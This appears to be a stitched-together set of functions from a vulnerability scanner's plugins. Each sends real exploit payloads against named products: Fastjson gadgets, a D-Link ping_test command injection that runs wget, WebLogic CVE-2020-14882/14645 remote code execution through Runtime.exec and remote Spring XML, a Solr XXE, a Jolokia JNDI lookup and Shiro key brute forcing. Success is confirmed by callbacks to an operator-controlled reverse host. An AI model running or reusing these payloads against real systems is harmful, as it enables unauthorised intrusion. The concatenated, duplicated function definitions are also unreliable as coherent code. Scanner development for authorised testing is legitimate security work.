def querytosave(self, payloads, param):
    """Poll the reverse-connection log for each payload's hexdata and save
    the first (payload) that produced a callback.

    Only the first lookup sleeps/waits for the callback; the remaining
    lookups poll immediately (query_reverse(..., False)).
    """
    if not payloads:  # bug fix: avoid IndexError on an empty payload list (sibling overload guards this)
        return
    payload, hexdata = payloads[0]
    res, res_data = query_reverse(hexdata)
    if res:
        self.save(param, payload)
        return
    for payload, hexdata in payloads[1:]:  # subsequent lookups do not sleep/wait
        res, res_data = query_reverse(hexdata, False)
        if res:
            self.save(param, payload)
            break
def querytosave(self, querys):
    """Check the reverse log for every queued query and persist the first
    body whose hexdata shows a callback.

    The initial lookup uses query_reverse's default wait behaviour; all
    later lookups poll without sleeping.
    """
    if not querys:
        return
    first_hex, first_body = querys[0]
    hit, _ = query_reverse(first_hex)
    if hit:
        self.save(first_body)
        return
    # Remaining lookups: no sleep/wait.
    for hexdata, bodywithpayload in querys[1:]:
        hit, _ = query_reverse(hexdata, False)
        if hit:
            self.save(bodywithpayload)
            return
def verify(self):
    """Fastjson java.net.Inet4Address probe: injects a DNS-callback payload
    into a JSON request body and confirms the hit via the dnslog query."""
    if not self.dictdata.get("request").get(
            "content_type") == 4:  # request body must be JSON
        return
    parse = dictdata_parser(self.dictdata)
    if not self.can_output(parse.getrootpath() + self.name):  # report only once per root path
        return
    payload_ = '''{"%(random_str)s": {"@type": "java.net.Inet4Address", "val": "%(domain)s"}}'''
    random_str = get_random_str(6).lower()
    # Unique DNS token bound to this url's file path.
    _, domain_ = generate(parse.getfilepath(), "dns")
    payload = payload_ % {"random_str": random_str, "domain": domain_}
    req = parse.generaterequest({"data": payload})
    r = request(**req)
    if r is not None:
        res, res_data = query_reverse(domain_)
        if res:
            parser_ = response_parser(r)
            self.result.append({
                "name": self.name,
                "url": parser_.geturl(),
                "level": self.level,  # 0:Low 1:Medium 2:High
                "detail": {
                    "vulmsg": self.vulmsg,
                    "others": "{} in dnslog".format(domain_),
                    "request": parser_.getrequestraw(),
                    "response": parser_.getresponseraw()
                }
            })
            # Mark this root path as reported so it is not reported again.
            self.can_output(parse.getrootpath() + self.name, True)
    return
def verify(self):
    """proxy.stream SSRF probe: requests proxy.stream?origin= with both an
    http reverse url and a dns token, then polls the reverse log."""
    # Directory-depth limit from config.py (max_dir).
    if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2:
        return
    reverseurl, hexdata1 = generate(get_random_str(10).lower(), "http")
    _, hexdata2 = generate(get_random_str(10).lower(), "dns")
    for reverse in [reverseurl, "http://" + hexdata2]:
        req = {
            "url": self.url + "proxy.stream?origin={}".format(reverse),
            "method": "GET",
            "headers": {
                "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
            },
            "verify": False,
            "timeout": 10,
        }
        r = request(**req)
    sleep = True  # only the first reverse-log lookup waits
    for hexdata in [hexdata1, hexdata2]:
        res, resdata = query_reverse(hexdata, sleep)
        sleep = False
        if res:
            self.result.append({
                "name": self.name,
                "url": self.url,
                "level": self.level,  # 0:Low 1:Medium 2:High
                "detail": {
                    "vulmsg": self.vulmsg,
                    # NOTE(review): "{reverseurl}" is a literal (no .format call) —
                    # presumably meant as a template-style hint; confirm intent.
                    "path": "proxy.stream?origin={reverseurl}",
                    "others": "{} in reverse db".format(hexdata),
                }
            })
            break
def verify(self):
    """D-Link apply_sec.cgi ping_test command-injection check: injects a
    wget of a reverse-payload URL and confirms via the reverse log."""
    # Directory-depth limit from config.py (max_dir).
    if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2:
        return
    cmds, hexdata = generate_reverse_payloads("dlink-cve-2019-16920-rce" + self.url)
    url = cmds[0].split(" ")[-1]  # URL part of the first generated command
    req = {
        "method": "POST",
        "url": self.url + "apply_sec.cgi",
        "headers": {
            "Content-Type": "application/x-www-form-urlencoded",
        },
        "data": '''html_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20{}'''.format(
            url),
        "timeout": 10,
        "verify": False,
        "allow_redirects": False
    }
    r = request(**req)
    res, resdata = query_reverse(hexdata)
    if r is not None and res:  # idiom fix: was `r != None`
        parser_ = response_parser(r)
        self.result.append({
            "name": self.name,
            "url": parser_.geturl(),
            "level": self.level,  # 0:Low 1:Medium 2:High
            "detail": {
                "vulmsg": self.vulmsg,
                "others": "{} in reverse data".format(hexdata),
                "request": parser_.getrequestraw(),
                "response": parser_.getresponseraw()
            }
        })
def verify(self):
    """WebLogic CVE-2020-14645 host-scan check: runs the exploit jar against
    an ldap and a dns reverse endpoint, then polls the reverse log."""
    if not self.check_rule(self.dictdata, self.require):  # preconditions for this test
        return
    # Only proceed when the fingerprinted service mentions weblogic.
    if "weblogic" not in "".join(self.dictdata.get("service").values()).lower():
        return
    jarfile = os.path.join(paths.MYSCAN_HOSTSCAN_BIN, "weblogic",
                           "CVE-2020-14645.jar")
    ldapaddr, ldaphexdata = generate(self.addr + get_random_str(6), "ldap")
    _, dnshexdata = generate(self.addr + get_random_str(6), "dns")
    # Prefer https when the service keys mention it.
    protocol = "https" if "https" in "".join(
        self.dictdata.get("service").keys()) else "http"
    start_process(["java", "-jar", jarfile,
                   ldapaddr.replace("ldap://", "", 1),
                   "{protocol}://{addr}:{port}/".format(protocol=protocol, **self.dictdata)])
    start_process(["java", "-jar", jarfile, dnshexdata,
                   "{protocol}://{addr}:{port}/".format(protocol=protocol, **self.dictdata)])
    for i, hexdata in enumerate((ldaphexdata, dnshexdata)):
        sleep = True if i == 0 else False  # only the first lookup waits
        res, data = query_reverse(hexdata, sleep)
        if res:
            self.result.append({
                "name": self.name,
                "url": "tcp://{}:{}".format(self.addr, self.port),
                "level": self.level,  # 0:Low 1:Medium 2:High
                "detail": {
                    "vulmsg": self.vulmsg,
                    "others": "found {} in reverse log ".format(hexdata)
                }
            })
            break
def count_status():
    """Periodically log scan-progress counters from redis plus the reverse-log
    total, every `status_flush_time` seconds (default 30)."""
    red = getredis()
    while True:
        try:
            time.sleep(int(scan_set.get("status_flush_time", 30)))
            burpdata_undo = red.llen("burpdata")
            vuln = red.llen("vuln_all")
            data = red.hmget("count_all", "doned", "request", "block_host",
                             "request_fail")
            burpdata_doned, request, block_host, request_fail = list(
                map(lambda x: x.decode(), data))
            reverse_count = 0
            res, resdata = query_reverse("myscan_total")
            if res:
                reverse_count = int(resdata.get("total"))
            logger.warning(
                "do/undo:{}/{} req_succ:{}/fail:{} blockhost:{} vuln:{}/reverse:{}"
                .format(burpdata_doned, burpdata_undo, request, request_fail,
                        block_host, vuln, reverse_count),
                text="STATUS")
        except KeyboardInterrupt:
            logger.warning("Ctrl+C was pressed ,aborted program")
            break  # bug fix: actually stop the loop so Ctrl+C aborts as logged
        except Exception as ex:
            # best-effort status loop: log and keep running
            logger.warning("Count stat moudle get error:{}".format(ex))
def query(self):
    """Poll the reverse log for every (param, hexdata) pair queued earlier
    and record a finding for each hit; only the first lookup waits."""
    sleep = True
    for param, hexdata in self.hexdatas:
        res, _ = query_reverse(hexdata, sleep)
        sleep = False
        if res:
            self.result.append({
                "name": self.name,
                "url": self.parse.getrootpath(),
                "level": self.level,  # 0:Low 1:Medium 2:High
                "detail": {
                    "vulmsg": self.vulmsg,
                    "payload": self.payload,
                    # param is None when the payload was placed in the raw body
                    "param": "body部分" if param is None else param.get("name", ""),
                    "others": "{} in dnslog".format(hexdata),
                    "request": self.parse.getrequestraw(),
                    "response": self.parse.getresponseraw()
                }
            })
            # Mark this root path as reported.
            self.can_output(self.parse.getrootpath() + self.name, True)
    return
def verify(self):
    """Fire reverse HTTP + DNS command payloads via self.run and report when
    any callback appears in the reverse log."""
    # Strict depth limit: reverse-connection checks only at the site root.
    if self.url.count("/") != 3:
        return
    reverse_urls, hexdata_url = generate_reverse_payloads(self.name)
    reverse_dnscmd, hexdata_dns = generate_reverse_payloads(
        self.name, "dns")
    tasks = reverse_dnscmd + reverse_urls
    mythread(self.run, tasks)
    sleep = True  # only the first reverse-log lookup waits
    for hexdata in [hexdata_url, hexdata_dns]:
        query_res, _ = query_reverse(hexdata, sleep)
        sleep = False
        if query_res:
            parser_ = dictdata_parser(self.dictdata)
            self.result.append({
                "name": self.name,
                "url": self.url,
                "level": self.level,  # 0:Low 1:Medium 2:High
                "detail": {
                    "vulmsg": self.vulmsg,
                    "others": "{} in dnslog".format(hexdata),  # fixed key typo ("others:")
                    "request": parser_.getrequestraw(),
                    "response": parser_.getresponseraw()
                }
            })
            break
def verify(self):
    """NiFi check: run every reverse task sequentially (exploit() also issues
    delete-task calls), then poll the reverse log when the target is NiFi."""
    # Directory-depth limit from config.py (max_dir).
    if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2:
        return
    reverse_urls, hexdata_url = generate_reverse_payloads(self.name)
    reverse_dnscmd, hexdata_dns = generate_reverse_payloads(self.name, "dns")
    tasks = reverse_dnscmd + reverse_urls
    for task in tasks:
        self.exploit(task)  # sequential on purpose: exploit() deletes the task it creates
    if self.isnifi:
        sleep = True  # only the first reverse-log lookup waits
        for hexdata in [hexdata_url, hexdata_dns]:
            query_res, _ = query_reverse(hexdata, sleep)
            sleep = False
            if query_res:
                parser_ = dictdata_parser(self.dictdata)
                self.result.append({
                    "name": self.name,
                    "url": self.url,
                    "level": self.level,  # 0:Low 1:Medium 2:High
                    "detail": {
                        "vulmsg": self.vulmsg,
                        "others": "{} in dnslog".format(hexdata),  # fixed key typo ("others:")
                        "request": parser_.getrequestraw(),
                        "response": parser_.getresponseraw()
                    }
                })
                break
def verify(self):
    """Fastjson dnslog probe: sends several @type gadget payloads into every
    JSON-valued parameter (and the raw body when it is JSON), then checks
    dnslog for callbacks recorded by send_payload in self.hexdatas."""
    if self.dictdata.get("url").get("extension") in notAcceptedExt:
        return
    self.parse = dictdata_parser(self.dictdata)
    if not self.can_output(self.parse.getrootpath() + self.name):  # report only once
        return
    # Collect parameters whose current value already is JSON.
    params = self.dictdata.get("request").get("params").get("params_url") + \
        self.dictdata.get("request").get("params").get("params_body")
    test_args = []
    for param in params:
        arg = param.get("value", "")
        if isjson(arg):
            test_args.append(param)
    # None marks "whole request body" when the body itself is JSON.
    if self.dictdata.get("request").get(
            "content_type") == 4:
        test_args.append(None)
    payloads = [
        '''{"RANDOM": {"@type": "java.net.Inet4Address", "val": "DOMAIN"}}''',
        '''Set[{"@type":"java.net.URL","val":"http://DOMAIN"}''',
        '''{{"@type":"java.net.URL","val":"http://DOMAIN"}:0''',
        '''{"@type":"java.net.InetSocketAddress"{"address":,"val":"DOMAIN"}}''',
    ]
    if test_args:
        datas = []
        for payload in payloads:
            for arg_ in test_args:
                datas.append((payload, arg_))
        mythread(self.send_payload, datas, cmd_line_options.threads)
        # query dns log — only the first lookup waits
        sleep = True
        for param, hexdata in self.hexdatas:
            res, res_data = query_reverse(hexdata, sleep)
            sleep = False
            if res:
                self.result.append({
                    "name": self.name,
                    "url": self.parse.getrootpath(),
                    "level": self.level,  # 0:Low 1:Medium 2:High
                    "detail": {
                        "vulmsg": self.vulmsg,
                        "others": "{} in dnslog".format(hexdata),
                        "param": "no param ,body vuln" if param is None else param.get(
                            "name", ""),
                        "request": self.parse.getrequestraw(),
                        "response": self.parse.getresponseraw()
                    }
                })
                # Mark this root path as reported.
                self.can_output(self.parse.getrootpath() + self.name, True)
    return
def verify(self):
    """Fire reverse commands (http variant plus a dns-host variant) against
    the base path and securityRealm/user/admin/, then poll the reverse log."""
    # Directory-depth limit from config.py (max_dir).
    if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2:
        return
    reverse_urls, reverse_data = generate_reverse_payloads(self.name)
    _, dns_data = generate(self.name, "dns")
    tasks = []
    for reverse_url in reverse_urls:
        # Each command in two flavors: the raw http reverse url, and the same
        # command with the reverse ip swapped for the dns token.
        for cmd in [reverse_url,
                    reverse_url.replace(reverse_set.get("reverse_http_ip", ""), dns_data)]:
            for path in ["", "securityRealm/user/admin/"]:
                tasks.append((cmd, path))
    mythread(self.run, list(set(tasks)))
    sleep = True  # only the first reverse-log lookup waits
    for hexdata in [reverse_data, dns_data]:
        query_res, _ = query_reverse(hexdata, sleep)
        sleep = False
        if query_res:
            parser_ = dictdata_parser(self.dictdata)
            self.result.append({
                "name": self.name,
                "url": self.url,
                "level": self.level,  # 0:Low 1:Medium 2:High
                "detail": {
                    "vulmsg": self.vulmsg,
                    "others": "{} in dnslog".format(hexdata),  # fixed key typo ("others:")
                    "request": parser_.getrequestraw(),
                    "response": parser_.getresponseraw()
                }
            })
            break
def verify(self):
    """WebLogic wls-wsat check: posts generated payloads for both OS flavors,
    confirms via the reverse log, and falls back to a low-confidence
    response-signature finding when no callback arrives."""
    self.result_ = {}
    # Directory-depth limit from config.py (max_dir).
    if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2:
        return
    self.parser = dictdata_parser(self.dictdata)
    find_it = False
    payloads = self.generatepayloads()
    for os_ver in ["win", "linux"]:
        for payload in payloads[os_ver]:
            req = {
                "url": self.url + "wls-wsat/CoordinatorPortType",
                "method": "POST",
                "headers": {
                    "Content-Type": "text/xml;charset=UTF-8",
                    "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
                },
                "verify": False,
                "data": self.get_windows_payload(payload)
                if "win" == os_ver else self.get_linux_payload(payload),
                "timeout": 10,
            }
            r = request(**req)
            # HTTP 500 with an xml prologue in the body is the suspicious signature.
            if r != None and r.status_code == 500 and b"<?xml version=" in r.content:
                find_it = True
    ##check — poll the reverse log; only the first lookup waits
    hexdatas = list(set(payloads["hexdata"]))
    res, res_data = query_reverse(hexdatas[0])
    if res:
        self.save(2, "find {} in reverse log ".format(hexdatas[0]))
        return
    for hexdata in hexdatas[1:]:  # subsequent lookups do not sleep/wait
        res, res_data = query_reverse(hexdata, False)
        if res:
            self.save(2, "find {} in reverse log".format(hexdata))
            return
    # No callback: report low confidence based on the response signature alone.
    if find_it:
        self.save(0, "maybe vuln due to the response")
def verify(self):
    """Command-injection sweep over url/body parameters using reverse HTTP
    and DNS payloads, confirmed via the reverse log."""
    # Only extension-less urls pass (`x not in ""` is False only for x == "").
    if self.dictdata.get("url").get("extension") not in "":
        return
    # Bug fix: the parser must exist before it is used by can_output below
    # (original assigned self.parse after the first use).
    self.parse = dictdata_parser(self.dictdata)
    if not self.can_output(self.parse.getrootpath() + self.name):  # report only once
        return
    reqs = []
    params = self.dictdata.get("request").get("params").get("params_url")
    # Include body params when the body is urlencoded.
    if self.dictdata.get("request").get(
            "content_type") == 1:
        params += self.dictdata.get("request").get("params").get(
            "params_body")
    # Build command payloads: http variant plus a dns-host variant each.
    cmds = []
    payloads_, http_hexdata = generate_reverse_payloads(self.name)
    _, dnshexdata = generate_reverse_payloads(self.name, "dns")
    for payload in payloads_:
        cmds.append(payload)
        cmds.append(
            payload.replace(reverse_set.get("reverse_http_ip"), dnshexdata))
    # Every (param, cmd, template) combination becomes one request; the
    # report intentionally does not pin down which parameter triggered.
    for param in params:
        for cmd in cmds:
            for payload, func in self.payloads:
                payload = payload % (func(cmd))
                req = self.parse.getreqfromparam(param, "a", payload, False)
                reqs.append(req)
    # send it
    mythread(self.send, reqs)
    # query — only the first reverse-log lookup waits
    sleep = True
    for hexdata in [http_hexdata, dnshexdata]:  # renamed: no longer shadows the loop variable
        query_res, _ = query_reverse(hexdata, sleep)
        sleep = False
        if query_res:
            self.result.append({
                "name": self.name,
                "url": self.parse.getrootpath(),
                "level": self.level,  # 0:Low 1:Medium 2:High
                "detail": {
                    "vulmsg": self.vulmsg,
                    "others": "{} in dnslog".format(hexdata),  # fixed key typo ("others:")
                    "request": self.parse.getrequestraw(),
                    "response": self.parse.getresponseraw()
                }
            })
            self.can_output(self.parse.getrootpath() + self.name, True)
            break
def verify(self):
    """checkurl.csp command-injection check (https-only target): appends the
    generated payloads after a ';' and confirms via the reverse log."""
    # Directory-depth limit from config.py (max_dir).
    if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2:
        return
    # sangfor require https
    if self.dictdata.get("url").get("protocol", "") == "http":
        return
    self.parser = dictdata_parser(self.dictdata)
    can_check = False
    payloads = self.generatepayloads()
    for os_ver in ["win", "linux"]:
        for payload in payloads[os_ver]:
            req = {
                "url": self.url +
                "por/checkurl.csp?retry=1&timeout=4&url=www.baidu.com;{}".
                format(payload),
                "method": "GET",
                "headers": {
                    "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
                },
                "verify": False,
                "timeout": 10,
            }
            r = request(**req)
            # Body "1" with 200 means the url check ran — worth confirming.
            if r is not None and r.status_code == 200 and r.content == b"1":
                can_check = True
    ##check — only poll the reverse log when the signature matched
    if can_check:
        hexdatas = list(set(payloads["hexdata"]))
        res, res_data = query_reverse(hexdatas[0])  # first lookup waits
        if res:
            self.save(2, "find {} in reverse log ".format(hexdatas[0]))
            return
        for hexdata in hexdatas[1:]:  # subsequent lookups do not sleep/wait
            res, res_data = query_reverse(hexdata, False)
            if res:
                self.save(2, "find {} in reverse log".format(hexdata))
                return
        # Signature matched but no callback (target may have no egress).
        self.save(0, "根据特征,应该存在漏洞,但是由于不出网等原因,所以无反向请求")
def verify(self):
    """Solr check: enumerate cores via the admin API, then attempt an
    external-entity (XXE) fetch through the core's select handler; report
    high on a reverse-log hit, otherwise report the exposed admin API (low)."""
    # Directory-depth limit from config.py (max_dir).
    if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2:
        return
    req = {
        "method": "GET",
        "url": self.url + "solr/admin/cores?wt=json",
        "headers": self.dictdata.get("request").get("headers"),  # keep cookies etc.
        "timeout": 10,
        "allow_redirects": False,
        "verify": False,
    }
    r = request(**req)
    if r != None and r.status_code == 200 and b"responseHeader" in r.content:
        # First core name from the JSON body.
        name = re.search('"name":"(.*?)"', r.text)
        if name:
            name = name.group(1)
            reverse_data = generate_reverse_payloads("solr_xxe")
            # URL part of the first generated reverse command.
            url = reverse_data[0][0].split(" ", 1)[1]
            req["url"] = self.url + '''solr/{name}/select?q=<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [ <!ENTITY % remote SYSTEM "{url}"> %remote;]> <root/>&wt=xml&defType=xmlparser'''.format(name=name, url=url)
            r1 = request(**req)
            query_res, data = query_reverse(reverse_data[1])
            if query_res:
                request_ = ""
                response_ = ""
                if r1 != None:
                    parser_ = response_parser(r1)
                    request_ = parser_.getrequestraw()
                    response_ = parser_.getresponseraw()
                self.result.append({
                    "name": self.name,
                    "url": self.url,
                    "level": self.level,  # 0:Low 1:Medium 2:High
                    "detail": {
                        "payload": req["url"].encode(),
                        "vulmsg": self.vulmsg,
                        "request": request_,
                        "response": response_
                    }
                })
            else:
                # No callback: still report the open solr admin endpoint.
                self.result.append({
                    "name": self.name,
                    "url": self.url,
                    "level": 0,  # 0:Low 1:Medium 2:High
                    "detail": {
                        "payload": req["url"].encode(),
                        "vulmsg": "target open solr ,target :{}".format(
                            self.url + "solr/admin/cores?wt=json"),
                    }
                })
def count_status():
    """Periodically log webscan/hostscan progress counters from redis along
    with the reverse-log total, every `status_flush_time` seconds."""
    red = getredis()
    while True:
        try:
            time.sleep(int(scan_set.get("status_flush_time", 30)))
            burpdata_undo = red.llen("burpdata")
            if scan_set.get("random_test", False):
                # Random-test mode keeps pending work in a set.
                unactive = red.scard("work_data_py_set")
            else:
                # Otherwise pending work sits in a list.
                unactive = red.llen("work_data_py")
            vuln = red.llen("vuln_all")
            data = red.hmget("count_all", "doned", "request", "block_host",
                             "request_fail", "active")
            burpdata_doned, request, block_host, request_fail, active = list(
                map(lambda x: x.decode(), data))
            reverse_count = 0
            res, resdata = query_reverse("myscan_total")
            if res:
                reverse_count = int(resdata.get("total"))
            if cmd_line_options.command == "hostscan":
                logger.warning(
                    "do/undo/active/unactive:{}/{}/{}/{} vuln:{}/reverse:{}".
                    format(burpdata_doned, burpdata_undo, active, unactive,
                           vuln, reverse_count),
                    text="STATUS")
            elif cmd_line_options.command == "webscan":
                if cmd_line_options.allow_plugin:
                    undoplugin = red.llen("plugin_data_py")
                    logger.warning(
                        "do/undo/active/unactive/undoplugin:{}/{}/{}/{}/{} req_total/fail:{}/{} blockhost:{} vuln:{}/reverse:{}"
                        .format(burpdata_doned, burpdata_undo, active,
                                unactive, undoplugin, request, request_fail,
                                block_host, vuln, reverse_count),
                        text="STATUS")
                else:
                    logger.warning(
                        "do/undo/active/unactive:{}/{}/{}/{} req_total/fail:{}/{} blockhost:{} vuln:{}/reverse:{}"
                        .format(burpdata_doned, burpdata_undo, active,
                                unactive, request, request_fail, block_host,
                                vuln, reverse_count),
                        text="STATUS")
        except KeyboardInterrupt:
            logger.warning("Ctrl+C was pressed ,aborted program")
            break  # bug fix: actually stop the loop so Ctrl+C aborts as logged
        except Exception as ex:
            # Best-effort status loop: log, print the traceback, keep running.
            logger.warning("Count stat moudle get error:{}".format(ex))
            traceback.print_exc()
def poc2(self):
    """Second CVE-2020-14882 exploitation path (from jas502n's PoC): abuses
    Spring ApplicationContext handles to load a remote XML from the reverse
    http2 endpoint, then checks the reverse log for the fetch."""
    for postdata in [
            '''_nfpb=true&_pageLabel=HomePage1&handle=com.bea.core.repackaged.springframework.context.support.ClassPathXmlApplicationContext("{}")''',
            '''_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("{}")'''
    ]:
        random_file = get_random_str(9).lower() + ".xml"
        url, hexdata = generate(random_file, "http2")
        req = {
            "method": "POST",
            "url": self.url + '''console/images/%252E%252E%252Fconsole.portal''',
            "data": postdata.format(url),
            "headers": {
                "Content-Type": "application/x-www-form-urlencoded",
                "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169"
            },
            "allow_redirects": False,
            "timeout": 10,
            "verify": False,
        }
        r = request(**req)
        res, _ = query_reverse(hexdata)
        if res:
            # Fall back to the original request data when no response came back.
            parser = response_parser(
                r) if r is not None else dictdata_parser(self.dictdata)
            self.result.append({
                "name": self.name,
                "url": self.dictdata.get("url").get("url").split("?")[0]
                if r is None else r.url,
                "level": self.level,  # 0:Low 1:Medium 2:High
                "detail": {
                    "vulmsg": self.vulmsg,
                    "others": "second way to find :{} in reverse".format(hexdata),
                    "payload": postdata,  # fixed key typo ("payload:")
                    "request": parser.getrequestraw(),
                    "response": parser.getresponseraw()
                }
            })
def save(self,r,hexdata,other=""): if r != None: res, res_data = query_reverse(hexdata) if res: parse_ = response_parser(r) self.result.append({ "name": self.name, "url": self.dictdata.get("url").get("url").split("?")[0], "level": self.level, # 0:Low 1:Medium 2:High "detail": { "vulmsg": self.vulmsg, "othermsg":other, "request": parse_.getrequestraw(), "response": parse_.getresponseraw(), } })
def poc1(self, data):
    """First exploitation path: coherence ShellSession handle running `cmd`,
    confirmed via a reverse-log lookup of `hexdata`.  Intended for threaded
    callers — poc1_success gates duplicate reporting."""
    cmd, hexdata = data
    payload = '''?_nfpb=true&_pageLabel=HomePage1&handle=com.tangosol.coherence.mvel2.sh.ShellSession(%22java.lang.Runtime.getRuntime().exec(%27{}%27);%22);'''
    req = {
        "method": "POST",
        "url": self.url + '''console/images/%252E%252E%252Fconsole.portal''',
        "data": payload.format(parse.quote(cmd)),
        "headers": {
            "Content-Type": "application/x-www-form-urlencoded",
            "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169"
        },
        "allow_redirects": False,
        "timeout": 10,
        "verify": False,
    }
    r = request(**req)
    if not self.poc1_success:  # skip the lookup once another worker succeeded
        res, _ = query_reverse(hexdata)
        if res:
            # Fall back to the original request data when no response came back.
            parser = response_parser(
                r) if r is not None else dictdata_parser(self.dictdata)
            if not self.poc1_success:  # re-check before recording (concurrent workers)
                self.poc1_success = True
                self.result.append({
                    "name": self.name,
                    "url": self.dictdata.get("url").get("url").split("?")[0]
                    if r is None else r.url,
                    "level": self.level,  # 0:Low 1:Medium 2:High
                    "detail": {
                        "vulmsg": self.vulmsg,
                        "others": "first way to find :{} in reverse".format(hexdata),
                        "payload": payload,
                        "request": parser.getrequestraw(),
                        "response": parser.getresponseraw()
                    }
                })
def verify(self):
    """Shiro rememberMe key brute-force: when the response Set-Cookie shows
    shiro's rememberMe=deleteMe marker, try every candidate key (each tagged
    with a reverse token) and poll dnslog; report the winning key, or a
    low-level "shiro found" finding when no key hits."""
    if self.dictdata.get("url").get("extension").lower() in notAcceptedExt:
        return
    self.parse = dictdata_parser(self.dictdata)
    self.maxkey = self.parse.getrootpath() + self.name
    set_cookie = self.dictdata.get("response").get("headers").get(
        "Set-Cookie", None)
    if set_cookie is not None and "rememberMe=deleteMe" in set_cookie:
        # One attempt per site, regardless of success or failure.
        if not self.can_output(self.maxkey):
            return
        # Mark done now so this ip:port is never retried.
        self.can_output(self.maxkey, True)
        # send key to enum
        mythread(self.send_poc, self.shirokyes, cmd_line_options.threads)
        # query from reverse_dnslog — only the first lookup waits
        sleep = True
        for querykey, shirokey in self.querykeys.items():
            res, resdata = query_reverse(querykey, sleep)
            sleep = False
            if res:
                self.result.append({
                    "name": self.name,
                    "url": self.parse.getfilepath(),
                    "level": self.level,  # 0:Low 1:Medium 2:High
                    "detail": {
                        "vulmsg": self.vulmsg,
                        "key": shirokey,
                        "request": self.parse.getrequestraw(),
                        "response": self.parse.getresponseraw()
                    }
                })
                break
        # No key produced a callback: still record that shiro is present.
        if self.result == []:
            self.result.append({
                "name": "shiro found",
                "url": self.parse.getfilepath(),
                "level": 0,  # 0:Low 1:Medium 2:High
                "detail": {
                    "vulmsg":
                    "found shiro and brute key is failed. maybe the web server can't access dnslog ,try others tools .",
                    "request": self.parse.getrequestraw(),
                    "response": self.parse.getresponseraw()
                }
            })
def verify(self):
    """xxl-job executor check: fingerprint the /run endpoint by its error
    body, then fire reverse HTTP + DNS payloads and poll the reverse log."""
    # Strict depth limit: reverse-connection checks only at the site root.
    if self.url.count("/") != 3:
        return
    # Fingerprint: an empty POST to /run leaks the executor class name.
    req = {
        "method": "POST",
        "url": self.url + "run",
        "headers": {
            "Content-Type": "application/json"
        },
        "allow_redirects": False,
        "verify": False,
        "timeout": 10
    }
    r = request(**req)
    if r is not None and b"com.xxl.job.core.server" in r.content:
        reverse_urls, hexdata_url = generate_reverse_payloads(self.name)
        reverse_dnscmd, hexdata_dns = generate_reverse_payloads(
            self.name, "dns")
        tasks = reverse_dnscmd + reverse_urls
        mythread(self.run, tasks)
        sleep = True  # only the first reverse-log lookup waits
        for hexdata in [hexdata_url, hexdata_dns]:
            query_res, _ = query_reverse(hexdata, sleep)
            sleep = False
            if query_res:
                parser_ = dictdata_parser(self.dictdata)
                self.result.append({
                    "name": self.name,
                    "url": self.url,
                    "level": self.level,  # 0:Low 1:Medium 2:High
                    "detail": {
                        "vulmsg": self.vulmsg,
                        "others": "{} in dnslog".format(hexdata),  # fixed key typo ("others:")
                        "request": parser_.getrequestraw(),
                        "response": parser_.getresponseraw()
                    }
                })
                break
def verify(self):
    """Jolokia JNDI probe: POSTs service:jmx:rmi JNDI targets generated by
    self.generate() to /jolokia/ and polls the reverse log for callbacks."""
    # Directory-depth limit from config.py (max_dir).
    if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2:
        return
    payload = '''{ "type" : "read", "mbean" : "java.lang:type=Memory", "target" : { "url" : "service:jmx:rmi:///jndi/%s" } }'''
    req = {
        "method": "POST",
        "url": self.url + "jolokia/",
        "headers": {
            "Content-Type": "application/x-www-form-urlencoded"
        },
        "data": "",
        "timeout": 10,
        "allow_redirects": False,
        "verify": False,
    }
    data = self.generate()
    for payload_ in data["payload"]:
        req["data"] = payload % (payload_)
        r = request(**req)  # response body is not inspected; confirmation is reverse-only
    sleep = True  # only the first reverse-log lookup waits
    parser_ = dictdata_parser(self.dictdata)
    for hexdata_ in list(set(data["hexdata"])):
        res, res_data = query_reverse(hexdata_, sleep=sleep)
        sleep = False
        if res:
            # NOTE(review): no break here — several hits would append several
            # findings for the same url; confirm whether that is intended.
            self.result.append({
                "name": self.name,
                "url": self.url,
                "level": self.level,  # 0:Low 1:Medium 2:High
                "detail": {
                    "vulmsg": self.vulmsg,
                    "request": parser_.getrequestraw(),
                    "response": parser_.getresponseraw()
                }
            })
def verify(self):
    """salt-api check: fingerprint the API index by its client names, then
    fire reverse HTTP + DNS payloads and poll the reverse log."""
    # Directory-depth limit from config.py (max_dir).
    if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2:
        return
    # Fingerprint: the index lists the local_async/local_batch clients.
    req = {
        "method": "GET",
        "url": self.url,
        "allow_redirects": False,
        "verify": False,
        "timeout": 10
    }
    r = request(**req)
    if r is not None and b"local_async" in r.content and b"local_batch" in r.content:
        reverse_urls, hexdata_url = generate_reverse_payloads(self.name)
        reverse_dnscmd, hexdata_dns = generate_reverse_payloads(
            self.name, "dns")
        tasks = reverse_dnscmd + reverse_urls
        mythread(self.run, tasks)
        sleep = True  # only the first reverse-log lookup waits
        for hexdata in [hexdata_url, hexdata_dns]:
            query_res, _ = query_reverse(hexdata, sleep)
            sleep = False
            if query_res:
                parser_ = dictdata_parser(self.dictdata)
                self.result.append({
                    "name": self.name,
                    "url": self.url,
                    "level": self.level,  # 0:Low 1:Medium 2:High
                    "detail": {
                        "vulmsg": self.vulmsg,
                        "others": "{} in dnslog".format(hexdata),  # fixed key typo ("others:")
